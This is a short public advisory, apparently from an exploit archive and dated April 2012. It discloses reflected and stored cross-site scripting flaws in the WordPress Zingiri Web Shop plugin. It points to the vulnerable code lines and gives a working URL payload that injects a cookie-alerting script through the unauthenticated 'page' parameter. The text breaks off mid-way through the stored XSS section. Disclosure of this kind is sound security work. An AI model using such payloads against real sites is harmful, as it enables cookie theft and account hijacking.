############################################################################## Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities author...............: Mehmet Ince twitte...............: https://twitter.com/#!/mmetince mail.................: mehmet.ince@bga.com.tr software link........: http://www.zingiri.com affected versions....: tested on 2.3.0 and 2.4.0 # Exploit Title: Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities # Google Dork: # Date: 26 Apr 2012 # Author: Mehmet INCE # Software Link: http://downloads.wordpress.org/plugin/zingiri-web-shop.2.4.0.zip # Version: 2.4.0 and older. # Tested on: version of 2.3.0 and 2.4.0 with Ubuntu 11.10 Server with Firefox browser. ############################################################################## /* ## BASIC XSS PS: Exploitable without Authentication plugins/zingiri-web-shop/zing.inc.php line at 401. if ($process=='content' && $page!='ajax' && $page!='downldr') echo '
'; Exploit: http://localhost/wordpress/?page=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 'page' variable isn't properly sanitized before being used. ## STORED XSS PS: Attacker should be logged for exploit. ./fws/pages-front/onecheckout.php line 27-29 if (!empty($_POST['notes'])) { $notes=$_POST['notes']; } and line 348